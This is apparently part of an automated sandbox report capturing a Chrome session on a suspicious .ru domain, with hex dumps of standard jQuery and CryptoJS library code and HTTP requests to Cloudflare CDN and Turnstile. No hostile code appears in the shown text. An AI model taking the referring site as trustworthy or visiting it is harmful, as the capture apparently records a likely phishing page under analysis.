                                  2024-11-25 23:28:21 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                  Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                  2024-11-25 23:28:21 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                  Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                  2024-11-25 23:28:21 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                  Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                  2024-11-25 23:28:21 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                  Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                  2024-11-25 23:28:21 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                  Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  4192.168.2.449746104.17.24.144432484C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:28:21 UTC651OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                  Host: cdnjs.cloudflare.com
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                  sec-ch-ua-platform: "Windows"
                                  Accept: */*
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: script
                                  Referer: https://8a6b7.qvzjymmm.ru/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2024-11-25 23:28:21 UTC967INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:28:21 GMT
                                  Content-Type: application/javascript; charset=utf-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Access-Control-Allow-Origin: *
                                  Cache-Control: public, max-age=30672000
                                  ETag: W/"61182885-40eb"
                                  Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                  cf-cdnjs-via: cfworker/kv
                                  Cross-Origin-Resource-Policy: cross-origin
                                  Timing-Allow-Origin: *
                                  X-Content-Type-Options: nosniff
                                  CF-Cache-Status: HIT
                                  Age: 1408571
                                  Expires: Sat, 15 Nov 2025 23:28:21 GMT
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YbK5%2BLjqP%2BsKeQ9ga%2Fyt1v9qxPibGdaMrclpCuxpX%2B3JfkuyEFglwM0ep3qcijcnxCjVlNwkvHsNxSUkJAwv9STI3DP2KFM7iadCygIq57%2Bgjq9%2BkNknYRABa%2FQBZAS4hpZPyKE9"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                  Strict-Transport-Security: max-age=15780000
                                  Server: cloudflare
                                  CF-RAY: 8e856a251fd50f81-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  2024-11-25 23:28:21 UTC402INData Raw: 37 62 65 61 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                  Data Ascii: 7bea!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                  2024-11-25 23:28:21 UTC1369INData Raw: 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62
                                  Data Ascii: "!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Ob
                                  2024-11-25 23:28:21 UTC1369INData Raw: 6f 2e 63 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e
                                  Data Ascii: o.clone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.ran
                                  2024-11-25 23:28:21 UTC1369INData Raw: 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72
                                  Data Ascii: ing"==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var
                                  2024-11-25 23:28:21 UTC1369INData Raw: 4e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30
                                  Data Ascii: N(){for(var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0
                                  2024-11-25 23:28:21 UTC1369INData Raw: 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d
                                  Data Ascii: >>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]
                                  2024-11-25 23:28:21 UTC1369INData Raw: 28 74 2e 62 75 66 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72
                                  Data Ascii: (t.buffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={str
                                  2024-11-25 23:28:21 UTC1369INData Raw: 61 72 20 6f 3d 72 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48
                                  Data Ascii: ar o=r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGH
                                  2024-11-25 23:28:21 UTC1369INData Raw: 36 2a 61 2e 61 62 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76
                                  Data Ascii: 6*a.abs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}v
                                  2024-11-25 23:28:21 UTC1369INData Raw: 32 33 2c 41 5b 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c
                                  Data Ascii: 23,A[39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  5192.168.2.449745104.18.95.414432484C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:28:21 UTC649OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                  Host: challenges.cloudflare.com
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                  sec-ch-ua-platform: "Windows"
                                  Accept: */*
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: script
                                  Referer: https://8a6b7.qvzjymmm.ru/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2024-11-25 23:28:21 UTC386INHTTP/1.1 302 Found
                                  Date: Mon, 25 Nov 2024 23:28:21 GMT
                                  Content-Length: 0
                                  Connection: close
                                  access-control-allow-origin: *
                                  cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                  cross-origin-resource-policy: cross-origin
                                  location: /turnstile/v0/g/e4025c85ea63/api.js
                                  Server: cloudflare
                                  CF-RAY: 8e856a25ccb85e79-EWR
                                  alt-svc: h3=":443"; ma=86400


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  6192.168.2.449747104.18.95.414432484C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:28:22 UTC648OUTGET /turnstile/v0/g/e4025c85ea63/api.js HTTP/1.1
                                  Host: challenges.cloudflare.com
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                  sec-ch-ua-platform: "Windows"
                                  Accept: */*
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: script
                                  Referer: https://8a6b7.qvzjymmm.ru/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2024-11-25 23:28:23 UTC471INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:28:23 GMT
                                  Content-Type: application/javascript; charset=UTF-8
                                  Content-Length: 47695
                                  Connection: close
                                  accept-ranges: bytes
                                  last-modified: Tue, 19 Nov 2024 14:16:20 GMT
                                  cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                  access-control-allow-origin: *
                                  cross-origin-resource-policy: cross-origin
                                  Server: cloudflare
                                  CF-RAY: 8e856a304e470f64-EWR
                                  alt-svc: h3=":443"; ma=86400
